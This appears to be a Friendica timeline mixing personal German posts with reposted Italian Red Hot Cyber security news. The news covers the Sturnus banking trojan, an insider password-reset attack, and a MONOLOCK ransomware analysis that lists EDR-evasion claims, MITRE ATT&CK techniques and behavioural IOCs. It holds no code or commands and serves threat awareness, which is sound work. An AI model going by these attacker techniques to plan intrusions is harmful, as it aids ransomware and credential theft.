in reply to Katharina Nocun • 2 mesi fa • •

Ich verstehe wiederum viele Leute der Demokratischen Partei nicht, die immer noch glauben, dass man mit den Republikanern Kompromisse ausarbeiten könne, statt harte Opposition zu machen.

Tuxi ⁂

2 mesi fa • •

(52.5046782 13.4490212)

Tuxi ⁂
2 mesi fa — (52.5046782 13.4490212) • •

Mit dem letzten merge gibt es bei #Friendica jetzt die Möglichkeit, die 20 neuesten Beiträge eines Kontakts abzurufen. Das ist für mich deswegen interessant, weil ich gerne Beiträge von den Usern anschaue, bevor ich die Kontaktanfragen genehmige. Damit kann ich mir jetzt eben die letzten 20 Beiträge des Users abrufen und ansehen.

Ihr findet die Möglichkeit auf der Kontaktseite:

Danke @Michael 🇺🇦. 👍

#Fediverse

Issue 15321: Fetch the latest posts from contacts by annando · Pull Request #15322 · friendica/friendica

Fixes #15321. There is a new action called "fetch latest posts" on the contact page that will fetch the latest 20 posts of a contact: In the future this could be extended so that the pos...

^GitHub

#fediverse #friendica @Michael 🇺🇦

in reply to Michael 🇺🇦

Tuxi ⁂

in reply to Michael 🇺🇦 • 2 mesi fa • •

@Michael 🇺🇦
Bei meinen Tests hier ging es echt flott.

@Michael 🇺🇦

in reply to Tuxi ⁂

Michael 🇺🇦

in reply to Tuxi ⁂ • 2 mesi fa • •

Dann ist Dein Server schnell. Es wird mit mittlerer Priorität ausgeführt, d.h. die gesamte Verarbeitung ein- und ausgehender Posts hat Vorrang.

Deutscher Wetterdienst (DWD)

2 mesi fa • •

Deutscher Wetterdienst (DWD)
2 mesi fa • •

Letzte Nacht war es teils eisig kalt. Hier ein paar Minima....

Tabelle mit Tiefstwerten einiger Wetterstationen in der Nacht vom 20. auf den 21.11.2025 in Grad Celsius
Zugspitze -17.3
Oberharz am Brocken-Stiege -12.6
Brocken -9.3
Fichtelberg -9.3
Carlsfeld -9.1
Neuhaus am Rennweg -8.4
Schmücke -8.4
Berka, Bad (Flugplatz) -8.4
Veilsdorf -8.4
Arnstein-Müdesheim -8.3
Birx/Rhön -8.2
Meiningen -8.2
Harzgerode -8.1
Wasserkuppe -8.1
Feldberg/Schwarzwald -8.0
Königshofen, Bad -8.0
Schlüchtern-Herolz -8.0

in reply to Deutscher Wetterdienst (DWD)

Michael 🇺🇦

in reply to Deutscher Wetterdienst (DWD) • 2 mesi fa • •

Ich habe gerade zuerst "Deutscher Winterdienst (DWD)" gelesen - bei den Temperaturen wäre das ja auch passend

Michael 🇺🇦

2 mesi fa • •

Michael 🇺🇦
2 mesi fa • •

Der Blick von der obersten Etage des Büros ist auch ganz okay

Blick von oben auf die Speicherstadt. Im Hintergrund kann man die Elbphilharmonie sehen, sowie am Horizont die Kräne des Hamburger Hafens. Man sieht auch drei Kirchtürme. Der Himmel ist tiefblau.

like this

Cybersecurity & cyberwarfare

2 mesi fa • •

Cybersecurity & cyberwarfare
2 mesi fa • •

Sturnus, il trojan bancario che intercetta i messaggi di WhatsApp, Telegram e Signal

Gli specialisti di ThreatFabric hanno scoperto un nuovo trojan bancario, Sturnus. Il malware è in grado di intercettare i messaggi provenienti da app di messaggistica crittografate end-to-end (Signal, WhatsApp, Telegram) e di ottenere il pieno controllo dei dispositivi tramite VNC.

I ricercatori segnalano che Sturnus utilizza uno schema di comunicazione avanzato con i server di comando e controllo: una combinazione di crittografia in chiaro, RSA e AES.

... mostra di più

Sturnus, il trojan bancario che intercetta i messaggi di WhatsApp, Telegram e Signal

I ricercatori segnalano che Sturnus utilizza uno schema di comunicazione avanzato con i server di comando e controllo: una combinazione di crittografia in chiaro, RSA e AES.

Una volta installato, il malware si connette al server di comando e controllo, registra la vittima e crea due canali di comunicazione: HTTPS crittografato per i comandi e l’esfiltrazione dei dati e un WebSocket crittografato con AES per le operazioni VNC in tempo reale.

In genere, un’infezione da Sturnus inizia con il download di un APK dannoso mascherato da Google Chrome (com.klivkfbky.izaybebnx) o Preemix Box (com.uvxuthoq.noscjahae). Il metodo esatto di distribuzione è ancora sconosciuto, ma i ricercatori sospettano che gli aggressori utilizzino annunci pubblicitari dannosi o messaggi privati nelle app di messaggistica.

Il trojan intercetta i messaggi nelle app di messaggistica istantanea non durante la trasmissione, ma dopo la decrittazione. In sostanza, il malware legge semplicemente il contenuto direttamente dallo schermo del dispositivo infetto. Per farlo, Sturnus sfrutta il servizio di accessibilità, ottenendo l’accesso a tutto ciò che viene visualizzato sullo schermo: contatti, chat, messaggi in entrata e in uscita.

“Ciò consente di aggirare completamente la crittografia end-to-end, consentendo l’accesso ai messaggi dopo che sono stati decifrati da un’app legittima, dando agli aggressori accesso diretto a conversazioni presumibilmente private”, osservano i ricercatori.

Oltre a leggere i messaggi, Sturnus richiede privilegi di amministratore su Android, consentendogli di monitorare le modifiche alle password, bloccare da remoto il dispositivo ed eludere la rimozione. A meno che i privilegi di amministratore non vengano revocati manualmente, la disinstallazione e la rimozione tramite ADB saranno bloccate.

Utilizzando VNC, gli aggressori possono simulare la pressione di tasti, l’immissione di testo, lo scorrimento e la navigazione. Al momento opportuno, possono attivare una sovrapposizione nera ed eseguire azioni nascoste: trasferire denaro da app bancarie, confermare conversazioni, approvare l’autenticazione a più fattori, modificare le impostazioni o installare app aggiuntive.

Sturnus prende di mira principalmente i conti di istituti finanziari europei, utilizzando modelli di overlay regionali. Attualmente, la banca starebbe prendendo di mira principalmente utenti dell’Europa meridionale e centrale. Poiché la portata degli attacchi è ancora limitata, i ricercatori ritengono che gli hacker stiano testando le proprie capacità prima di lanciare campagne più ampie.

L'articolo Sturnus, il trojan bancario che intercetta i messaggi di WhatsApp, Telegram e Signal proviene da Red Hot Cyber.

Der Dings

2 mesi fa • •

Der Dings
2 mesi fa • •

Hey #Hamburg, @MeierSchulze und ich wollen wissen, was für Menschen eigentlich hinter diesen ganzen Profilbildchen hier stecken. Deshalb gibt’s ein #FediglüHH am Montag, 8.12., 18 Uhr auf dem Winterpride in St. Georg! Kommt vorbei, und dann sagen wir uns bei einem Heißgetränk Sachen wie „Ach, DU bist Schnickelschnack89?!“!

#hamburg #fedigluhh @Müller

in reply to Michael 🇺🇦

Müller

in reply to Michael 🇺🇦 • 2 mesi fa • •

@heluecht Da ist vom Dienst komme: An meiner Uniform 😂

@Michael 🇺🇦

in reply to Müller

Michael 🇺🇦

in reply to Müller • 2 mesi fa • •

Dich kann ich auch so erkennen, Du hast ja schließlich schon einmal ein Bild von Dir gepostet (ich glaube, das war ein Bild vom CSD)

Falls ich es schaffe, wäre ich daran zu erkennen, dass ich die Person bin, die gleichzeitig schüchtern und vorsichtig - sowie augenscheinlich extrovertiert agiert.

Redhotcyber

2 mesi fa • •

Redhotcyber
2 mesi fa • •

Garante Privacy in crisi: Fanizza lascia dopo la richiesta sulle email dei dipendenti

📌 Link all'articolo : redhotcyber.com/post/garante-p…

#redhotcyber #news #protezionedatidipersonali #garanteprotezionedati #angelfanizza #dimissioni #report #fattquotidiano #raccoltademail #dipendenti #dataprivacy #sicurezzadati #leaked #informazioni

Garante Privacy in crisi: Si Segretario Generale lascia dopo la richiesta sulle email dei dipendenti

Il Segretario Generale del Garante per la protezione dei dati personali, Angelo Fanizza, si è dimesso a seguito di una riunione straordinaria.

^{Redazione RHC (Red Hot Cyber)}

#redhotcyber #News #dataprivacy #report #informazioni #dipendenti #leaked #dimissioni #protezionedatidipersonali #garanteprotezionedati #angelfanizza #fattquotidiano #raccoltademail #sicurezzadati

8Bit Security

2 mesi fa • •

8Bit Security
2 mesi fa • •

🔥 Why VPN Is Not The Ultimate Solution For Online Security

VPNs are often marketed as the ultimate solution for online privacy and security. However, that's not entirely true: while VPNs can offer some advantages, they are far from a universal remedy, and can even be a weakness point for privacy. So, if you thought you could now do anything under the cloak of invisibility provided by your shiny new two-year VPN subscription… well, it's not exactly like that.

🔗 Link 👉 8bitsecurity.com/posts/why-vpn…

Why VPN Is Not The Ultimate Solution For Online Security

8Bit Security - Cybersecurity tips, insights, tools, and resources to protect your digital world.

^{8Bit Security}

Giovanni Cammarano reshared this.

in reply to 8Bit Security

Giorgio Maone 🚫✊🧅

in reply to 8Bit Security • 2 mesi fa • •

nice article. If I may add:
1. While almost all the HTTP traffic nowadays is indeed encrypted (I like to think in some measure due also to my NoScript code reused in HTTPSEverywhere), virtual host negotiation will still give away the domain names you're connecting to (and so will DNS, unless you use DoH) unencrypted.
2. Yes, all VPN must comply with legal requirements, but they cannot provide your data to authorities (or criminals, in case of a breach) if they don't have any: @mullvadnet , for instance, spins a VM for every client access, all volatile (in RAM) and destroys it after use. Of course, you still need to trust them to do what they say, and that's why you may prefer Tor.
3. You correctly mention the @torproject browser and Tails (thank you!), but when it comes to privacy-preserving browsers you forgot the Mullvad Browser, which is basically the Tor Browser optimized for VPNs rather than Tor, made by the Tor Project itself (full disclosure: I work in the devs team).

@The Tor Project @Mullvad VPN

Questa voce è stata modificata (2 mesi fa)

in reply to Giorgio Maone 🚫✊🧅

8Bit Security

in reply to Giorgio Maone 🚫✊🧅 • 2 mesi fa • •

@ma1 Absolutely on point, Giorgio, thanks for sharing!
Yep, the article was meant more as a response to the wave of commercial VPNs that popped up like a fashion trend over the last few years, and that many people buy without really understanding why. But achieving a truly “full privacy” setup still requires a few more steps, and of course it’s not for everyone.

ps: huge respect for being part of the dev team on this!

@Giorgio Maone 🚫✊🧅

Michael 🇺🇦

2 mesi fa • •

Michael 🇺🇦
2 mesi fa • •

Meine Pebble hat noch 11% Akkukapazität. Ich habe sie Mittwoch aufgeladen. Ich finde das okay für eine Smartwatch - vor allem wenn man bedenkt, dass ich sie nicht diese Woche aufgeladen habe und auch nicht in der Woche davor - sondern vor mehr als 14 Tagen.

Eine rechteckige Smartwatch mit schwarz/weiß-Display, das ein Watchface anzeigt, das an eine alte Casio-Digitaluhr erinnert. Die Uhr zeigt 9:25 am Freitag den 21. Man kann im Display auch die 11% Akku sehen. Das Gehäuse der Smartwatch ist weiß, das Armband ist rot.

like this

in reply to Michael 🇺🇦

N. E. Felibata 👽

in reply to Michael 🇺🇦 • 2 mesi fa • •

Das reicht doch eigentlich.

Unknown parent

Michael 🇺🇦

Unknown parent • 2 mesi fa • •

Steel Time? Hast Du dir eine gebrauchte Pebble gekauft?

Yining Karl Li

2 mesi fa • •

Yining Karl Li
2 mesi fa • •

Ohhhh I get it, Pixar's Hoppers isn't Avatar with beavers, it's Dune with beavers.

But actually I'm really excited for this movie; it looks so much more chaotic than their usual fare!

youtube.com/watch?v=PypDSyIRRS…

Hoppers | Official Trailer

but HOW did he get a little crown?? 👑🦫Disney and Pixar's #Hoppers arrives in theaters March 6, 2026!► SUBSCRIBE to the channel to get notified when new Pix...

^YouTube

Cybersecurity & cyberwarfare

2 mesi fa da Open app • •

Cybersecurity & cyberwarfare
2 mesi fa da Open app • •

Handling Human Waste in the Sky

Have you ever wondered what goes into making it possible to use the restroom at 30,000 feet (10,000 m)? [Jason Torchinsky] at the Autopian recently gave us an interesting look at the history of the loftiest of loos.

The first airline toilets were little more than buckets behind a curtain, but eventually the joys of indoor plumbing took to the skies. Several interim solutions like relief tubes that sent waste out into the wild blue yonder or simple chemical toilets that held waste like a flying porta-potty predated actual flush toilets, however. Then, in the 1980s, commercial aircraft started getting vacuum-driven toilets that reduce the amount of water needed, and thus the weight of the system.

These vacuum-assisted aircraft to

... mostra di più

Alyssa Coghlan

2 mesi fa • •

Alyssa Coghlan
2 mesi fa • •

Random thought: is red teaming LLM deployments *literally* "professional trolling"?

Michael 🇺🇦

2 mesi fa • •

Michael 🇺🇦
2 mesi fa • •

Guten Morgen Welt!

Ein Blick auf die Speicherstadt in Hamburg. Blauer Himmel, die Sonne ist nahezu komplett von einem breiten roten Backsteinbau versteckt. Man sieht zur linken zwei gläserne Bürogebäude mit um die 10 Stockwerken. Die Sonne spiegelt sich teilweise im linken Bürogebäude. Im Vordergrund ist eine breite Straße zu sehen, dahinter liegt ein Kanal, der die Straße von den roten Backsteinbauten trennt.

like this

in reply to Michael 🇺🇦

Matthias

in reply to Michael 🇺🇦 • 2 mesi fa da [ˈloma] | Friendica • •

@Michael 🇺🇦
Ein schicker Ausblick

@Michael 🇺🇦

in reply to Matthias

Michael 🇺🇦

in reply to Matthias • 2 mesi fa • •

Ja, es gibt Schlimmeres in der Welt

Wir sind auf einer der unteren Etagen, das Büro hat aber 15 Etagen. Der Ausblick von oben ist richtig toll.

like this

Redhotcyber

2 mesi fa • •

Redhotcyber
2 mesi fa • •

Sturnus, il trojan bancario che intercetta i messaggi di WhatsApp, Telegram e Signal

📌 Link all'articolo : redhotcyber.com/post/sturnus-i…

Gli specialisti di ThreatFabric hanno scoperto un nuovo #trojan bancario, Sturnus. Il malware è in grado di intercettare i messaggi provenienti da #app di messaggistica crittografate end-to-end (Signal, WhatsApp, #Telegram) e di ottenere il pieno #controllo dei #dispositivi tramite VNC.

A cura di Redazione RHC

#redhotcyber #news #cybersecurity #hacking #malware #trojanbancario #vnc #messaggisticaCrittografata #apkDannoso #googleChrome #preemixBox #crittografiaAvanzata #server #sicurezzaInformatica #minacceInformatiche

Sturnus, il trojan bancario che intercetta i messaggi di WhatsApp, Telegram e Signal

Scoperto un nuovo trojan bancario, Sturnus, che intercetta i messaggi di WhatsApp, Telegram e Signal e ottiene il pieno controllo dei dispositivi tramite VNC.

^{Redazione RHC (Red Hot Cyber)}

Cybersecurity & cyberwarfare

2 mesi fa • •

Cybersecurity & cyberwarfare
2 mesi fa • •

Dipendenti Infedeli: licenziato, rientra in azienda e resetta 2.500 password all’insaputa dell’azienda

Un impiegato si è dichiarato colpevole di aver hackerato la rete del suo ex datore di lavoro e di aver causato danni per quasi 1 milione di dollari dopo essere stato licenziato.

Secondo l’accusa, il trentacinquenne Maxwell Schultz, che aveva perso l’accesso ai sistemi aziendali, si è spacciato per un altro appaltatore e si è così reinfiltrato nella rete aziendale. Gli atti del Dipartimento di Giustizia non menzionano il nome dell’organizzazione, il che è tipico nei casi di malintenzionati.

I media locali, citando fonti, hanno riferito che l‘organizzazione potrebbe essere Waste Management, con sede a Houston, ma l’azienda stessa non ha risposto alle richieste dei giornalisti.

L’attacco

... mostra di più

Dipendenti Infedeli: licenziato, rientra in azienda e resetta 2.500 password all’insaputa dell’azienda

Un impiegato si è dichiarato colpevole di aver hackerato la rete del suo ex datore di lavoro e di aver causato danni per quasi 1 milione di dollari dopo essere stato licenziato.

I media locali, citando fonti, hanno riferito che l‘organizzazione potrebbe essere Waste Management, con sede a Houston, ma l’azienda stessa non ha risposto alle richieste dei giornalisti.

L’attacco è avvenuto il 14 maggio 2021. Utilizzando credenziali rubate, Schultz ha eseguito uno script di PowerShell e ha reimpostato circa 2.500 password presso l’organizzazione interessata. Di conseguenza, migliaia di dipendenti e collaboratori negli Stati Uniti hanno perso temporaneamente l’accesso alla rete aziendale.

L’atto d’accusa afferma che Schultz non solo ha reimpostato le password in massa, ma ha anche cercato di eliminare i registri di sistema per nascondere i suoi accessi. In alcuni casi, è addirittura riuscito a cancellare le registrazioni delle sue azioni e a cancellare il registro eventi di PowerShell.

L’accusa stima che l’attacco abbia causato danni per oltre 862.000 dollari. Questa cifra include i tempi di inattività dei dipendenti, le interruzioni dell’assistenza clienti e i costi per le indagini sull’incidente e il ripristino dell’infrastruttura.

La sentenza di Schultz è prevista per il 30 gennaio 2026. Rischia fino a dieci anni di carcere e una multa fino a 250.000 dollari.

Questa azienda ancora anonima non è l’unica ad affrontare simili problemi. Storie di malintenzionati che cercano vendetta sui datori di lavoro o che traggono profitto dall’hacking dei sistemi interni continuano a emergere regolarmente nel 2025.

Negli Stati Uniti, tra questi rientrano incidenti con Coinbase e FinWise, nonché casi di dipendenti IT nordcoreani che impiegavano aziende occidentali sotto falsa identità. In vari paesi, aziende, enti locali e persino agenzie di intelligence come l’agenzia di intelligence britannica GCHQ sono state sotto attacco.

Rapporti precedenti hanno incluso un dirigente senior che ha hackerato un sistema ospedaliero per i propri interessi commerciali, un ex amministratore che ha bloccato l’accesso del suo datore di lavoro alle apparecchiature di rete, uno sviluppatore senior che ha attivato un kill switch in un prodotto e un analista della sicurezza che ha tentato di reindirizzare i pagamenti di riscatto sul proprio account.

Tutto ciò sottolinea che le minacce interne rimangono una delle sfide più urgenti e imprevedibili per qualsiasi organizzazione.

L'articolo Dipendenti Infedeli: licenziato, rientra in azienda e resetta 2.500 password all’insaputa dell’azienda proviene da Red Hot Cyber.

Cybersecurity & cyberwarfare

2 mesi fa da Open app • •

Cybersecurity & cyberwarfare
2 mesi fa da Open app • •

MONOLOCK: il nuovo gruppo ransomware “silenzioso” che rifiuta leak site e affiliate panel

Il panorama ransomware sta cambiando. Gli attori più esposti — LockBit, Hunters International, Trigona — hanno pagato il prezzo della sovraesposizione, tra operazioni internazionali, infiltrazioni, leak volontari e collassi operativi.

Dopo anni dominati da modelli quasi industriali — affiliate panel, leak site, chat pubbliche e marketing aggressivo — emergono gruppi che rifiutano la logica “LockBit-style” e si spingono verso un approccio più opaco, minimale, quasi “da operatore SIGINT”. Low profile, tecnici, quasi “professionali”, che adottano strategie di invisibilità operativa.

Il ca

... mostra di più

MONOLOCK: il nuovo gruppo ransomware “silenzioso” che rifiuta leak site e affiliate panel

Il caso più recente è MONOLOCK, un nuovo gruppo ransomware apparso su DarkForums il 19 ottobre 2025 con un manifesto che sembra scritto più da un red team senior che da un cybercriminale tradizionale.

La loro presentazione è insolita, e soprattutto molto più tecnica rispetto alla media dei gruppi emergenti. E i dettagli offerti meritano un’analisi approfondita.

Un gruppo apolitico, tecnico e orientato all’OPSEC

MONOLOCK si definisce un’organizzazione apolitica specializzata nello sviluppo di toolkit per campagne ransomware completamente automatizzate, con una struttura modulare basata su BOF (Beacon Object File) e payload caricati direttamente in memoria.

Fin qui potrebbe sembrare un gruppo come tanti. Ma la svolta arriva quando dichiara quello che non farà:

Nessun leak site
Nessun affiliate panel
Nessuna vetrina pubblica delle vittime
Nessun hosting di builder o decryptor tramite server dedicati

Il motivo? La loro priorità è l’OPSEC, sia per sé stessi che per gli affiliati. Criticano apertamente i leak site: secondo MONOLOCK, la pubblicazione dei nomi delle vittime riduce la probabilità di pagamento, distrugge la reputazione anche in caso di riscatto e attira troppo l’attenzione delle forze dell’ordine. È una scelta controcorrente — e proprio per questo molto più sofisticata.

Il loro arsenale: moduli BOF e componenti avanzati

MONOLOCK presenta un’intera suite di moduli, tutti realizzati come BOF (Beacon Object File), la tecnologia nativa di Cobalt Strike per eseguire codice direttamente in memoria senza file drop.

Privilege Escalation: Tecniche senza modificare il registro, senza LOLBins, evitando pattern rilevabili dagli EDR.
Shadow Copy Wipe: Rimozione delle VSS per impedire qualunque tentativo di recupero locale.
Anti-Analysis: con controlli avanzati su: debugger, hypervisor, timing anomalies, processi sospetti, delta CPU ciclici. Questi sono dettagli tipici di sviluppatori esperti di malware, non di script kiddie.
Persistence: scheduled tasks con privilegi SYSTEM e trigger custom.
MonoSteal Exfiltration Engine: questo è uno dei moduli più importanti che garantisce: esfiltrazione accelerata, compressione live, I/O asincrono, velocità dichiarate fino a 45 MB/s. Un valore altissimo, comparabile — come dicono loro stessi — a StealBit di LockBit. Rimarchevole, considerando che gli esfiltratori RClone-based raramente superano i 5–10 MB/s su link reali.
MonoLock | Locker: Il ransomware vero e proprio, basato su algoritmo ChaCha20–Salsa20 ibrido con encryption asincrona fino a 276 MB/s dichiarati
MonoLock | Decrypt: decryptor controllato tramite una chiave privata hex encoded. Questo riduce drasticamente il rischio di “fork” o copie non autorizzate. È un sistema quasi “boutique ransomware”.

Nessun leak site, nessun panel: una strategia chirurgica

Alla domanda: “Avete un TOR site? Avete già vittime?”
Rispondono così:

“Hosting extortion updates adds unnecessary weight.
Vogliamo dare alle aziende la possibilità di recuperare dati e reputazione.”

E soprattutto:

“Un affiliate panel espone builder, decryptor, database affiliati e chiavi. FBI, CERT e ricercatori adorano queste infrastrutture. Non vogliamo offrirgli un bersaglio semplice.”

È una filosofia quasi “da intelligence”.
I loro post mostrano una consapevolezza rara: sanno perché i grandi RaaS sono caduti. E non vogliono fare gli stessi errori.

Reclutamento e IAB: MONOLOCK entra nella fase operativa

MONOLOCK sta cercando:

affiliati esperti: operatori in grado di muoversi in Active Directory
inizial access brokers (IAB)
malware development

E soprattutto: “Non accettiamo script kiddies”. Un messaggio destinato a filtrare affiliati impreparati — strategia usata anche da gruppi come Muliaka e dagli ex Conti Team Two.

Fee iniziale: 500$
Revenue share: 20% fisso

Livello tecnico: molto superiore alla media dei gruppi emergenti

Chi ha sviluppato i moduli BOF ha competenze avanzate:

conoscenza profonda API di Windows
red teaming
uso avanzato di C2
OPSEC
design modulare fileless

È probabile che il team provenga da:

ambienti di pentesting
gruppi defezionati da altri RaaS
ex sviluppatori di loader privati
ecosistemi Cobalt Strike / Sliver

Evasione EDR: la filosofia MONOLOCK

Uno dei passaggi più interessanti — e rari — nella comunicazione di MONOLOCK riguarda il tema dell’evasion EDR.
A differenza di molti gruppi RaaS che millantano “UD totale”, MONOLOCK affronta l’argomento in modo tecnico, quasi professionale, riconoscendo limiti, catena di esecuzione e punti deboli.

Nel loro post dichiarano:

“Our implants beat EDRs, we have tested Windows Defender Endpoint Detection, SentinelOne, Crowdstrike and all of the commercial AVs.”

Un’affermazione forte, ma subito accompagnata da una spiegazione inusuale per trasparenza e precisione tecnica.

Subito dopo, infatti, precisano:

“Since we utilize the BoF implant format, our implant execution is based on the C2 connection, meaning that if the shellcode is detected, there is no pipe through which the implants are being loaded. We offer a shellcode loader […] to mitigate precisely this.”

Questa frase è cruciale.
MONOLOCK sta affermando esplicitamente che:

il loro stealth non dipende dai moduli BOF, che girano in memoria ed effettivamente sfuggono a molte tecniche EDR
il vero punto di detection è il loader, ovvero il shellcode che stabilisce la connessione iniziale al C2

E aggiungono:

“Long story short, if the C2 gets a connection, implants will run no matter what.”

In altre parole: se il loader riesce anche solo una volta a passare, il beacon caricherà i BOF e l’intera catena di strumenti diventerà estremamente difficile da rilevare.

Nessuna promessa di undetectable: un approccio insolitamente realistico

Ed è qui che arriva la parte più sorprendente — e per certi versi professionale. Alla domanda su perché non pubblicizzino il loro toolset come “undetectable”, rispondono:

“Why don’t we explicitly mention the ‘UD’ status? We will be straightforward: utilizing UD is a vague expression… it eventually bolds down to each company infrastructure.”

In sintesi:

Non promettono undetectable totale
Non spingono marketing ingannevole
Non usano slogan RaaS tipici (“100% undetectable”)
Riconoscono che la detection dipende dall’infrastruttura della vittima
Confermano che la battaglia tecnica è sul loader, non sui BOF

Questo è un livello di autoconsapevolezza molto raro nei gruppi emergenti.

Perché MONOLOCK è estremamente pericoloso

Attacchi molto più difficili da rilevare: I BOF riducono la superficie rilevabile da EDR/XDR. Dichiarano di poter bypassare: Defender, SentinelOne e CrowdStrike.
Nessun leak site: le vittime perdono i “segnali esterni”, i ricercatori non hanno visibilità, aumenta l’incertezza e quindi aumentano le probabilità di pagamento.
Esfiltrazione ultra-veloce: 45 MB/s significa che possono rubare decine di GB in pochi minuti.
Locker ad alte prestazioni: Sui server moderni ChaCha20/Salsa20 è una scelta perfetta per velocità e stealth.
OPSec superiore alla media: niente tor, niente panel, niente centralizzazione. Un modello molto più resiliente.

MONOLOCK non è l’ennesimo ransomware “clone”. È un’evoluzione del modello, una forma di ransomware più: silenziosa, professionale, decentralizzata, tecnica.

È l’archetipo del “ransomware boutique”: piccolo team, codice avanzato, visibilità minima, efficienza massima.

Ci aspettiamo che le prime campagne reali emergano presto, probabilmente tramite Initial Access Broker già attivi nel mercato occidentale. E quando inizieranno, non sarà facile accorgersene.

FULL-PACKAGE CTI

([em]Profilo attore[/em], MITRE ATT&CK, TTP previsti, [em]IOC)[/em]

Profilo Attore – MONOLOCK

Tipo: Ransomware as a Toolkit (RAaT)
Modello: No leak site, no panel
Skill: Medio-alte
Tecnologia: BOF, loader fileless, C2 basati su beacon
Origine probabile: Europa Est (speculazione basata su linguaggio e pattern)
Target previsti: aziende con infrastrutture AD, ambienti corporate, PA

MITRE ATT&CK (previsione TTP)

Inizial Access
- T1078 – Valid Accounts
- T1190 – Vulnerability Exploitation (tramite IAB)
Execution
- T1047 – WMI
- T1620 – Reflective Code Loading / BOF Execution
Privilege Escalation
- T1548 – Abuse of Token
- T1068 – Exploitation for PrivEsc
Persistence
- T1053.005 – Scheduled Task SYSTEM
Defense Evasion
- T1027 – Obfuscation
- T1497 – Sandbox Evasion
- T1070.006 – Shadow Copy Deletion
- T1112 – Defense Modification Avoidance
Credential Access
- T1003 – LSASS dump (probabile BOF dedicato)
Lateral Movement
- T1021 – SMB/RDP
- T1087 – AD Enumeration
Exfiltration
- T1041 – Exfil via C2
- T1567.002 – Exfil Compressed
Impact
- T1490 – Stop Recovery
- T1486 – Data Encryption

IOC (comportamentali, non hash)

Processi anomali
- tasksche.exe → scheduled tasks elevati
- processi con injection reflective loader
- thread ad alta velocità in processi standard (es: svchost)
Network
- connessioni brevi e intermittenti verso VPS offshore
- pattern di traffico compressi e frammentati
File system
- cancellazione improvvisa VSS
- attività su path custom della ransom note

L'articolo MONOLOCK: il nuovo gruppo ransomware “silenzioso” che rifiuta leak site e affiliate panel proviene da Red Hot Cyber.

LaVi

2 mesi fa • •

LaVi
2 mesi fa • •

Ciao, sono quella che sfugge agli orrori dei tribunali ottocenteschi realizzando segnalibri con cartoncino di recupero ed evidenziatori glitterati. Voi tutto bene?

Il segnalibro quasi ultimato, con evidenziatore e indelebile in parte presenti nell'immagine

in reply to LaVi

Fabio

in reply to LaVi • 2 mesi fa • •

@LaVi Fuori fiocca. Tutto bene 👍

@LaVi

Questo sito web utilizza cookie tecnici e di sessione. Proseguendo la navigazione su questo sito, accetti l'utilizzo dei cookie.

⇧